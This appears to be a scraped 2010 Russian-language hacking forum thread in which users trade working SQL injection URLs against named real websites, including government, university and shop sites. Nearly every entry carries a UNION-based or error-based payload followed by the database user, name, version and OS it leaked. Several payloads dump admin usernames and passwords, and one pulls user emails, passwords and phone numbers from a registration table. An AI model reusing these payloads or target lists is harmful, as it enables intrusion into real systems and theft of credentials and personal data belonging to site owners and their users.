User:ihscslnews@pristina.dreamhost.com
Database:ihscslnews
Version:5.0.89-userstats-log
PR4
misto.co.ua
http://misto.co.ua./frankivsk/ogoloshennja/ogoloshennja.php?action=show&catid=1+union+select+1,concat_ws(0x3a,user(),datab ase(),version())--
User:dh27shdocka@localhost
Database:doshka
Version:5.1.42-log
tempstuff.murfdesigns.com
http://tempstuff.murfdesigns.com/art/add_comment.php?art_id=-283+union+select+concat_ws(0x3a,user(),database(), version()),2--
User:murf@eastman.dreamhost.com
Database:murfstuff
Version:5.0.89-userstats-log
buchlord
21.04.2010, 20:49
Нашел у своего провайдера на сайте ошибку , что с ней делать??????
http://svoyo.ru/modules/news/index.php?cat_view=world&subcat_view=life&news_view='
:)
http://onlineru.ru/?p=news&id=-167+union+select+1,2,concat_ws(0x3a,@@version,user (),database(),@@version_compile_os),4,5,6--
version:5.0.41-community-nt
user:onlineru_ru@localhost
database:onlineru_ru
os : Win32
http://www.salonlustr.ru/news/?newsid=-39+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database(),@@version_compile_os),5,6,7,8,9,10, 11,12,13,14,15--
version : 5.0.77-log
user : cl16093_salon@localhost
database : cl16093_salon
os : pc-linux-gnu
http://stela.ru/?select=catalogue&category_id=-1+UNION+ALL+SELECT+1,concat_ws(0x3a,@@version,user (),database(),@@version_compile_os),3,4,5,6,7+--+
version : 5.0.51a-3ubuntu5
user : root@localhost
database : u17595
os : debian-linux-gnu
mississippipolitical.com
http://www.mississippipolitical.com/Mississippi/product_desc.php?id=-283+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4--
User:Mississippi@208.109.14.20
Database:Mississippi
Version:4.0.27-max-log
PR4
humus.name
http://www.humus.name/index.php?page=News&ID=-283+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7--
User:slafshas@h12204@s127.loopia.se
Database:humus_name
Version:5.0.45-log
PR4
http://www.uni.ru/news.php?action=show_event&id=-117/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,concat_ws(0x3a,@@version,user(), database(),@@version_compile_os),11,12,13,14--
version : 5.1.31-log
user : uniuser@localhost
database : uni2007
os : unknown-freebsd7.1
[Feldmarschall]
22.04.2010, 03:04
http://www.rucksack-center.de/shop/index.php?static=modules/shop/templates/misc/show_detail_image.html&clean=yes&title=cowgirl&nummer=-00000000+UNION+SELECT+1,2,3,4,5,concat%28version%2 8%29,database%28%29,user%28%29%29,7,8,9--
User: v129429@localhost
Version: 5.0.83-community-log
DataBase: v129429
gov.ua:
http://www.shevruo.da-kyiv.gov.ua/index.php?w=infoarchive&id=-283+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6--&search=
User:shevadm@localhost
Database:shevr_ruo
Version:5.1.44
http://www.sobes-ter.gov.ua/index.php?cat=news&id=-283+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12--
User:user@localhost
Database:www
Version:4.1.22-community-nt
http://www.homeidei.ru/index.php?link=1&id=-127+and+1=2+union+all+select+aes_decrypt(aes_encry pt(concat_ws(0x3a,@@version,user(),database(),@@ve rsion_compile_os),0x71),0x71),2,3--
version : 5.0.90-community
user : b783_homeidea@localhost
database : b783_homeidei
os : unknown-linux-gnu
http://www.agencevu.com/exhibitions/index.php?id_cat=-77+UNION+SELECT+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29+from+users--[CODE]
User: proxygen@localhost
Version: 5.0.51a-3ubuntu5.5
Database: agencevu
Google PR: 6
http://www.avangard-sp.ru/index.php?id=-3195+union+/*!select*/+0,1,2,3,4,5,6,7,8,9,concat_ws(0x3a,@@version,user (),database(),@@version_compile_os),11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25--+
version : 5.1.36-log
user : avangard-s_mysql@212.193.246.224
database : avangard_s_db
os : portbld-freebsd7.2
spherics
23.04.2010, 04:47
В общем говорили уже про этот сервак типо все фильтрация итд но особо не заметил -).
PR 8
http://volcanoes.usgs.gov/activity/vona.php?id=687643423+union+select+1,2,3,4,concat_ ws(0x3a,version(),user(),database())--
Database Version: 5.0.27-log
Database name: vhp
User name: webuser@localhost
http://www.art-oasis.ru/press/id/?newsid=-13+union+select+0,1,2,3,4,5,6,7,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),user(),database(),@ @version_compile_os),0x71),0x71),9,10,11,12,13,14--
version : 4.1.13
user : oasis@server7
database : oasis
os : suse-linux
http://www.powdercoating.org/productList.php?id=1+union+select+1,2,34,5,67,8,9, 10,11,12,13,14,15,16,17,18,19,20,21--
Database Version: 5.0.22-community-max-nt
Database name: pci_web_89414
User name: pcinstitut_89414@66.226.20.40
KENT1994
23.04.2010, 15:21
http://www.iwdp.co.uk/profile.php?id=-1+UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11--
http://www.zucchicollection.org/pages/master.php?id=-32+union+select+1,2,3,version(),5,6,7--
http://www.msk-beauty.ru/news.html?id=-102+and+1=2+union+all+select+1,2,3,aes_decrypt(aes _encrypt(concat_ws(0x3a,version(),user(),database( ),@@version_compile_os),0x71),0x71),5,6,7,8,9,10--+
version : 5.0.90-log
user : u50785@10.8.0.31
database : u50785_bttop
os : portbld-freebsd7.2
http://www.cyberbody.ru/shop.php?brandid=-2+union+all+select+1,concat_ws(0x3a,version(),user (),database(),@@version_compile_os),3--+
http://tsp-shop.ru/vendors/?vendor=-2+union+all+select+1,2,3,concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),5,6,7,8,9, 10,11,12,13+--+
version : 4.1.25-log
user : tspshop@localhost
database : wwwtspshopru
os : portbld-freebsd6.2
KENT1994
23.04.2010, 22:37
http://www.pharm-system.com/index.phtml?page=news&id=-1 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8--
Host IP: 62.149.0.14
Web Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8e DAV/2 PHP/5.2.12 with Suhosin-Patch
Powered-by: PHP/5.2.12
DB Server: MySQL >=5
Current DB: pharm_system ;)
http://director-online.com/buildArticle.php?id=1154 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8--
http://www.helilooja.ee/liikmed.php?pid=106 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11,12--
http://www.nalog.od.ua/a.php?article_id=4680&rid=-1 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8--
milegyek.hu
http://www.milegyek.hu/open.php?id=-283+union+select+1,2,3,user(),version(),database() ,7,8,9,10,11,12,13,14--
User:saldoweb@localhost
Database:milegyek_hu
Version:5.1.37-1ubuntu5.1
PR5
ukrfoto.dp.ua
http://ukrfoto.dp.ua/download.php?id=283+union+select+1,2,3,4,5,concat_ ws(0x3a,user(),database(),version())--
User:saldoweb@localhost
Database:ukrfoto_dp
Version:4.1.25
dnsteel.com.ua
http://dnsteel.com.ua/index.php?id=-283+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9--
User:dnsteel@localhost
Database:dnsteel
Version:5.0.86
[Feldmarschall]
24.04.2010, 00:06
uk
http://www.philatelic-traders-society.co.uk/browse.php?detail=92+union+select+1,concat(version (),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24--
version - 5.0.27
db - pts
user - pts@localhost
http://www.bbimages.co.uk/product_detail.php?prod_id=374&store_cat_id=-16+union+select+1,2,3,version(),5,6,7,8,9--
version - 4.1.22
db - bbi001
user - bbi001user@localhost
http://www.tko-sports.co.uk/product_details.php?prod_id=-9+union+select+1,2,3,concat(database(),version(),u ser()),5,6,7,8,9,10--
version - 5.0.45
db - Research1
user - Research1@server213-171-218-145.livedns.org.uk
http://www.machinz.co.uk/Productview.php?product=-1+union+select+1,concat%28database%28%29,version%2 8%29,user%28%29%29--
version - 5.0.90-community
db - privile1_machinzdb
user - privile1_machinz@localhost
http://www.imageculture.co.uk/product.php?prod_id=-1+union+select+concat(database(),version(),user()) ,2--
version - 5.0.77
db - brentwood
user - client@localhost
http://lib.prometey.org/?cat_id=-1+AND+1=2+UNION+SELECT+1,2,3,4,5,6+from+user--+
version : 5.0.67-community
user : ---------
database : --------
os : pc-linux-gnu
[Feldmarschall]
24.04.2010, 06:12
https://fonic.chriskeim.com/B2CPortal/cp_productcard.asp?PageNo=PRODUCTCONFIG&MasterId=103706%27%20or%201=convert%28int,%28SELEC T%20@@version%29%29--
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
telspravka.com
http://ustilimsk.telspravka.com/fam.php?id=-283+union+select+1,concat_ws(0x3a,user(),database( ),version())--
User: u_telspravka@localhost
Database: telspravka
Version: 4.1.22-log
yp.md
http://www.yp.md/news2/news.php?id=-283+union+Select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13--
User: ypmd_tester@localhost
Database: ypmd_test
Version: 5.0.90-community-log
Банковская олимпиада banksbattle.ru (banksbattle.ane.ru)
http://banksbattle.ane.ru/333.php?archiv=2+union+select+1,concat(email,char( 47),pass,char(47),birthday1,char(47),phone_number, char(47),city),concat(f,char(47),i,char(47),o),con cat(preferable_act_types,char(47),future_achiev),5 ,6+from+users--
USERNAME:
banks@localhost
DBNAME:
banksbattle
TABLES:
admins,news,presentation,team_road,users
Поля в таблице users совпадают с названиями в регистрации
(например, f - фамилия, i - имя, phone_number - номер телефона)
[Feldmarschall]
24.04.2010, 17:19
http://www.jlgolf.co.uk/product.php?prod_id=-1+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15--
Version: 4.1.19-standard-log
Database: jlgolf
User: jlgolf@localhost
http://www.bobsgunshop.com/listings.php?id=120+union+select+1,2,version(),4,5 ,6/*
Version: : 4.0.25
Database: bobsguns
http://www.melaniefoster.co.uk/category.php?categoryID=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),us er(),database()),10,11--
Version: 5.1.26-rc-5.1.26rc
Database: db62601_melaniefoster
User: db62601@72.47.228.14
nemaniak
24.04.2010, 23:15
thebigspur.com PR-5
http://thebigspur.com/extras/gallery_image.php?image_id=-3131+union+all+select+1,concat_ws%280x3a,version%2 8%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10 ,11,12+--+
5.0.90-rs:bigspur_cont_p@localhost:bigspurcontent
crimsonconfidential.com PR-5
http://crimsonconfidential.com/extras/gallery_image.php?image_id=-42+union+all+select+1,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,1 1,12+--+
5.0.90-rs:crimson_cont_p@localhost:crimsoncontent
Pashkela
25.04.2010, 07:34
http://edukey.ru/page.php?type=providers&id=(select+1+from+(select+count(0),concat((select+ version()),floor(rand(0)*2))+from+information_sche ma.tables+group+by+2+limit+1)a)--+
5.0.67-log
http://www.parfumprestige.ru/new.phtml?idparfum=(select+1+from+(select+count(0) ,concat((select+version()),floor(rand(0)*2))+from+ information_schema.tables+group+by+2+limit+1)a)--+
5.0.26-lk-log
http://www.sexvideogid.ru/my/cart/add.php?id=1105+and+substring(version(),1,1)=5--+&kind=DVD
@@tmpdir: /tmp
database(): sexvg
version(): 5.1.33-log
@@version_compile_os: pc-linux-gnu
user(): susus@localhost
@@basedir: /usr/local/mysql/
@@datadir: /usr/local/mysql/var/
http://www.pharmabort.ru/page.php?id=-1+union+/*!select*/+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,ve rsion(),user(),database(),@@version_compile_os),0x 71),0x71),6,7,8,9,10,11,12,13,14,15+--
version : 5.0.87
user : pharmabort@zvm7
database : pharmabort
os : zportbld-freebsd6
http://www.infokon.ru/smallitems.php?nid=-14+union+select+1,aes_decrypt(aes_encrypt(concat_w s(0x3a,version(),user(),database(),@@version_compi le_os),0x71),0x71)--
version : 5.0.82-log
user : infokon@cub.mplik.ru
database : infokon
os : unknown-linux-gnu
KENT1994
25.04.2010, 13:49
http://www.sumaggo.com/detail.php?id=-29UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19--
Host IP: 69.89.31.167
Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver ;)
http://www.spsrasd.info/fr/detail.php?id=9336 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8--
Host IP: 80.86.198.13
Web Server: Apache/2
DB Server: MySQL >=5
http://www.kolizey.spb.ru/description.php?id=-803+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,concat_ws(0x3a,@@version,user(),database(),@ version_compile_os),18+--
version : 4.0.27-max-log
user : kolizey5@v1.valuehost.ru
database : kolizey5
os : unknown-freebsd4.7
http://www.softzavod.ru/full.php?id=64517'+UNION+SELECT+1,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+LIMIT+1 ,1--+
Database Version: 5.1.32-log
Database name: mirsofta_sz
User name: mirsofta_sz@localhost
Os : portbld-freebsd7.0
Agel Nash
26.04.2010, 11:42
Официальный сайт Валерии
http://valeriya.net/myblog/records/?&lang=rus&id=000000006+UNION+SELECT+1,2,33,4,username,6,conv ert(user_password+using+cp1251),9+FROM+phpbb_users--
http://www.rowanaxp.org/stories.php?id=-9+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os),2,3,4,5,6,7,8,9--+
version:5.0.89-userstats-log
user:angus@dali.dreamhost
database:rowanaxp
http://www.u2wanderer.org/disco/lyrics.php?id=-639+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9--+
version:4.0.27-standard
user:wanderu2_still@localhost
http://www.wqhs.org/playlist.php?id=-3412+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()@version_compile_os),7,8--+
file_priv=y
version:5.0.83-log
user:wqhs@cgi1403.int.bizland.net
database:wqhs
pr:5
colorist
26.04.2010, 18:56
http://www.vl.ru/tv/?dt=2010-01-28%5C&rubrics%5B%5D=2)+union+select+1,2,3,version(),5,6, 7,8,9,10,11+--+&submit=%CF%EE%EA%E0%E7%E0%F2%FC%21
version=5.0.22-log5
:D
hacker-nubik
26.04.2010, 19:09
http://www.rb.ru/line/index.php?poid=6+and+row(1,2)%3C(select+count(*),c oncat((select+concat(email,0x3a,id)+from+ipb.ibf_m embers++where+mgroup='7'+limit+1,1),0x3a,floor(ran d(0)*2))+x+from+ipb.ibf_members+group+by+x+limit+1 )+--+&tags=1427'
Nek1t,
http://forum.antichat.ru/showpost.php?p=1630322&postcount=13
http://forum.antichat.ru/showpost.php?p=1778081&postcount=15
http://www.wineforwheels.org/eventdetails.php?id=60'+and+0+union+select+1,conca t_ws(80x3a,version(),database(),user(),@@version_c ompile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26--+
version:5.0.45
user:wfw_prod@localhost
pr:4
http://www.eecl.biz.nf/d22/news.php?go=fullnews&newsid=-10+union+select+1,2,3,4,5,6,7--
user() : eecom@82.197.130.21
version() : 4.1.18-log
database() : eecom
OS : Linux
----------------------------------------------------------------------------------------
http://www.emiclassics.com/artistbiography.php?aid=-126+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,8,19,20,21,22,23,24,25,26+from+users--
user(): emiclassics2@vlonj206w2.emihosting.com
version(): 4.1.22-log
database(): emiclassics2
OS: красная шапочка
----------------------------------------------------------------------------------------
http://www.icewarm.com.au/page.php?pId=-183+union+select+1,2,3--
user(): dbwwwadmin@localhost
version(): 4.1.21
database(): icewarm
OS: slackware-linux-gnu
----------------------------------------------------------------------------------------
http://www.onlymelbourne.com.au/melbourne_details.php?id=-7185+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56+from+admin--
user(): onlymelb_onlymel@localhost
version(): 5.0.90-community
database(): onlymelb_melbourne
OS: Linux
-----------------------------------------------------------------------------------------
http://www.jurasadministracija.lv/en/index.php?id=-6+union+select+1,concat(user(),version(),database( ),@@version_compile_os),3,null,null,6,7,8--
user(): www_designer@localhost
version(): 5.0.67
database(): LJA_WWW
OS: pc-linux-gnu
-----------------------------------------------------------------------------------------
http://www.jfc.lv/skonto/modules.php?name=photos&gid=1+union+select+1+from+admins--
user(): фильтрация
version(): 5
database(): фильтрация
OS: Debian
-----------------------------------------------------------------------------------------
http://weddingrings.com.ph/viewcouple.php?num=-11+union+select+1,2+from+wp_users
user(): weddink5_matus@localhost
version(): 5.1.45-log
database(): weddink5_matus
OS: Linux
-----------------------------------------------------------------------------------------
http://www.itmaasia.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27+from+tb_admin--
user(): citme_wanhu@localhos
version(): 5.1.33-community
database(): exhibition
OS: Windows
-----------------------------------------------------------------------------------------
http://www.1sttunisia.com/detail-actualite.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--
user(): ebizprod@localhost
version(): 5.0.85
database(): ebizproduction
OS: pc-linux-gnu
-----------------------------------------------------------------------------------------
http://press.az/news1.php?Id=-39+union+select+1--
user(): mediade_samir@localhost
version(): 5.0.81-community
database(): mediade_portal
OS: pc-linux-gnu
--------------------------------------------------
http://www.kannondance.ru/vo.php?razd=teachers&about=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+administr ation--
user(): kannondance@195.242.3.251
version(): 4.0.27-log
database(): kannondance
OS: freebsd 4.9
--------------------------------------------------
http://www.drinkaware.ie/index.php?sid=7&pid=-84+union+select+1,2,3,4,5,6,7+from+tbl_diary_users--
user(): meas51_pixel@web5.hosting365.ie
version(): 5.0.45-community-log
database(): meas51_pixel
OS: pc-linux-gnu
--------------------------------------------------
http://www.waterbabies.ie/region.php?FID=-12+union+select+1,2,3,4,5+from+users--
user(): wbweb@ns.rpadesign.co.uk
version(): 5.1.33-log
database(): nemo
OS: portbld-freebsd7.2
--------------------------------------------------
http://www.mathsrevision.net/gcse/pages.php?page=-9+union+select+1,2,3,4,5,6--
user() : mathsrevisio@192.168.0.6
version() : 4.1.22-standard-log
database() : mathsrevisio
OS: pc-linux-gnu
------------------------------------------------------------------------------
http://www.ireland.anglican.org/index.php?do=newsprevious&sid=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
user() : cofiadmin@server213-171-218-66.livedns.org.uk
version() : 5.0.45-log
database() : cofi
OS: красная шапочка
------------------------------------------------------------------------------
http://wbstraining.com/php/conference2010/show_page.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
user() : lomokev@server213-171-218-189.livedns.org.uk
version() : 5.0.77
database() : wbs
OS : красная шапочка
------------------------------------------------------------------------------
http://www.diariodelistmo.com/seccion.php?ids=-3+union+select+1--
user() : root@localhost
version() : 5.0.87-community-nt
database() : istmodiario
OS: Windows
------------------------------------------------------------------------------
http://58.68.146.33/php/jixiangwu/show_pic.php?id=-204+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
user() : root@localhost
version() : 5.0.67-community-log
database() : jixiangwu
OS: красная шапочка
----------------------------------------------------------------------------------------------------
http://www.starnav.com.cn/news_view.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21--
user():starnav@localhost
version():5.0.22-community-nt
database():starnav
OS: Windows
--------------------------------------------------------------------------------
http://www.fexco.com/news-view.php?id=-161+union+select+1,2,3,4,5,6,7,8--
user() : splashg_fexco72@localhost
version() : 5.0.51b-community-nt
database() : splashg_fexco
OS: Windows
--------------------------------------------------------------------------------
http://www.lemniscaat.nl/dynamic/genrelijst.php?genre=-28+union+select+1,2,3,4--
user(): pushki00_lemdbr@wh-www3.xs4all.nl
version(): 5.0.32-Debian_7etch8-log
database(): pushki00_lemdb
OS: pc-linux-gnu
http://newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=64+and+0+union+select+1,2,3,4,5,6,7,concat_ws( 0x3a%20,user(),database(),version()),9,10,11,12,13 ,14,15,16,17,18,19,20,21+from+nuke_users--
User: Uwww223S@localhost
Version: 4.0.26-log
Database: udb223
http://gq.rfidchina.org/company.php?id=2283+AND+1=0+UNION+SELECT+concat_ws (0x3a,user(),database(),version()),2,3,4,5,6,7+--+
User: root@localhost
Database: gongqiu
Version: 5.1.24-rc-log
http://www.terradigm.org/news.php?id=-19+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6--+
version:4.1.20-log
user:terradigmUSER@64.34.227.191
http://www.magical-kenya.de/index.php/reiseplanung/angebote?option=com_travel&view=detail&offerID=-14+UNION+SELECT+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29+from+ktbde_users--
User: dbu1111831@localhost
Version: 5.0.32-Debian_7etch11-log
Database: db1111831-magicalkenyade
Google PR: 5
Joomla - Нет реакции на username/password
http://www.hyperhidrosis.ru/parts.php?id=55'+union+select+1,2,3,4,concat_ws(0x 3a%20,user(),database(),version()),6,7,8,9,10,11/*
User: hyperhidrosis@localhost
Version: 5.0.45
Database: kuzmichev_hyperhidrosis
http://www.art-spb.ru/catalog/index.php?category_id=-9999+and+1=2+union+select+1,aes_decrypt(aes_encryp t(concat_ws(0x3a,@@version,user(),@@version_compil e_os),0x71),0x71),3,4,5,6,7,8,9,10,11,12--&good_style_rus=%C0%E1%F1%F2%F0%E0%EA%F6%E8%EE%ED%E 8%E7%EC
version : 5.0.70-log
user : st1945@localhost
database : st1945_db
os : pc-linux-gnu
http://www.amontobin.com/storeNew/detail.php?item_type=poster&id=-11+u nion+select+1,2,version(),4,5,6,7,8,9,10,11,12/*
version: 4.1.25-Debian_mt1-log
user: db4336@64.13.192.27
database: db4336_admin
http://www.autoupgradedirect.com/cart/pagedisp.php?id=-1+u nion+select+1,version(),3,4,5,6,7,8,9--
version: 5.0.45-log
user: staging2@web01.configuretech.com
database: staging2
goldwm.net
Version: 5.0.67
User: u65177@78.108.84.13
Database: b65177
http://goldwm.net/news_detail.php?id=-1+union+select+1,2&page=1
#################################
instantmoney.ru
Version: 5.0.81-community
User: instantm_vrenev@localhost
Database: instantm_instantmbd
http://instantmoney.ru/news_detail.php?id=-1+union+select+1,2&page=1
#################################
vashobmennik.ru
Version: 5.0.67-percona-highperf-b7-log
User: konandr@localhost
Database: konandr_obmen
http://vashobmennik.ru/news_detail.php?id=-1+union+select+1,2&page=1
#################################
rates.by
Version: 5.0.67-percona-highperf-b7-log
User: kaminsky@localhost
Database: kaminsky_rates
http://rates.by/news_detail.php?id=-1+union+select+1,2&page=1
#################################
changewm.org
Version: 5.0.85
User: u51503@78.108.84.19
Database: b51503_obmen
http://changewm.org/news_detail.php?id=-1+union+select+1,2&page=1
#################################
kursdeneg.info
Version: 5.0.90
User: kursdeneg_new@localhost
Database: kursdeneg_new
http://kursdeneg.info/news_detail.php?id=-1+union+select+1,2&page=1
#################################
monitorkursov.com
Version: 5.1.42
User: monito_zen@localhost
Database: monku438_kurs
http://monitorkursov.com/news_detail.php?id=-1+union+select+1,2&page=1
#################################
smartchange.biz
Version: 5.0.90-community
User: wm6933_smartch@localhost
Database: wm6933_smartchange
http://smartchange.biz/news_detail.php?id=-1+union+select+1,2&page=1
#################################
www.exchanger-eye.ru
Version: 5.0.89-community-log
User: autocad_monitor5@localhost
Database: autocad_monitor5
http://www.exchanger-eye.ru/news_detail.php?id=-1+union+select+1,2&page=1
Strilo4ka
27.04.2010, 13:13
Дорк: Сайт работает на BVLCMS
http://www.bvl.com.ua/?id=site&content=6&article=-209%27+union+select+1,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29,@@version_compile_os% 29,3,4,5,6,7,8,9,10,11,12,13--+5.0.51a-24+lenny3:admin1@localhost:azlk:debian-linux-gnuhttp://www.bvl.com.ua/?id=site&content=6&article=-209%27+union+select+1,GROUP_CONCAT%28SCHEMA_NAME%2 0SEPARATOR%200x3a%29,3,4,5,6,7,8,9,10,11,12,13+fro m+information_schema.SCHEMATA--+information_schema:azlk:bank1:blog1:blogclub:club :computer:kuzov:market:novosti:obyav:pig:televizor :testhttp://www.bvl.com.ua/?id=site&content=6&article=-209'+union+select+1,GROUP_CONCAT(TABLE_NAME SEPARATOR 0x3a),3,4,5,6,7,8,9,10,11,12,13+from+information_s chema.TABLES+WHERE+TABLE_SCHEMA='azlk'--+admin:fbody:fheader:sessions:sprcitat:sprcoment:s prcomentgal:sprcontent:sprgallery:sprlibrary:sprma inrazd:sprsubrazd:spruserhttp://www.bvl.com.ua/?id=site&content=6&article=-209%27+union+select+1,GROUP_CONCAT%28COLUMN_NAME%2 0SEPARATOR%200x3a%29,3,4,5,6,7,8,9,10,11,12,13+FRO M+information_schema.COLUMNS+WHERE+TABLE_NAME=%27a dmin%27--+username:passwordhttp://www.bvl.com.ua/?id=site&content=6&article=-209%27+union+select+1,group_concat%28concat_ws%280 x3a,username,password%29%20separator%200x40%29,3,4 ,5,6,7,8,9,10,11,12,13+from+admin--+
http://www.mirvokrug.info/crimea/pano.php?id=-55+union+select+1,concat_ws(0x3a%20,user(),databas e(),version()),3,4--
User: chernish@localhost
Version: 5.0.67-percona-highperf-b7-log
Database: chernish_hotel3d
http://www.stinkyjournalism.org/editordetail.php?id=-444++union+select+1,concat_ws(0x3a,admin_id,admin_ name,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29+from+admin
Version:5.0.77
User:stinky@localhost
Database:stinky
pr:5
Не удалось найти админ панель.
http://www.jgeosci.org/index.php?pg=ref&ID=jgeosci.-059'+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),user%28%29,@@version_compile_os),5,6,7,8 ,9,10,11,12,13--+
user: prj_jgeosci_brw@localhost
version: 5.1.45
Datebase: prj_jgeosci
pr: 6
http://botox.axilla.ru/parts.php?id=35'+union+select+1,2,3,4,concat_ws(0x 3a%20,user(),database(),version()),6,7,8,9,10,11/*
User: axillaBotox@localhost
Version: 5.0.45
Database: kuzmichev_axillaBotox
vitessemodels.com
http://www.vitessemodels.com/vitesse_range.php?id=-2+u nion+select+version()/*
version: 4.1.20
user: vitesse_dbuser@localhost
database: vitesse_db
http://www.tornworld.net/settingpageview.php?id=8+union+select+1,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),3,4,5,6,7,8,9,10,11--+
user:ellenmillion@accra.dreamhost.com
version:5.0.88-userstats-log
database:snowiebase
firstassetfunds.com
http://www.firstassetfunds.com/products/fund.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24/*
version: 4.0.20
user: fafunds@web1.syonex.com
database: fafunds
PR 4
wellydiecast.com
http://www.wellydiecast.com/product_detail.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a,user(),database(),version()),15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56/*
version: 4.1.22-standard
user: welly_db@localhost
database: welly_db
PR 3 | ТИЦ 30
lumenessence.co.uk
http://www.lumenessence.co.uk/artist.php?id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3/*
version: 5.0.32-Debian_7etch12-log
user: lum_000@localhost
database: Lo033
PR 3
spacedev.com
http://www.spacedev.com/hybrid_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7/*
version: 4.1.20-max-log
user: doubleb_user@76.163.252.90
database: doubleb_space
PR 6 | ТИЦ 60
lhsaa.org
http://www.lhsaa.org/sports.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database())
version: 5.0.90-community
user: athletic_mudball@localhost
database: athletic_sports
PR 5 | ТИЦ 10
http://www.game-over.net/reviews.php?id=-898%27+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user%28%29,@@version_compile_os),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49--+
version:5.1.39
user::game-over@localhost
database:gameover
pr:6
Доигрались=)
http://www.dhammaweb.net/dhamma_news/view.php?id=-16+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11,12,13,14,15,16--+
version:4.0.27-max-log
user:dhamma_news@64.202.166.236
database:dhamma_news
pr:4
growinc.net
http://www.growinc.net/bios.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5
version: 5.0.83-log
user: romeo_osma@cgi0702.int.bizland.net
database: grow
http://www.uh.edu/news-events/newsrelease.php?releaseid_int=-239+union+select+1,concat_ws(0x3a%20,user(),databa se(),version()),3,4,5,6,7,8--
User: newsUser@callisto.matrix.uh.edu
Version: 4.1.16standard-log
Database: uhnews
Google PR: 7
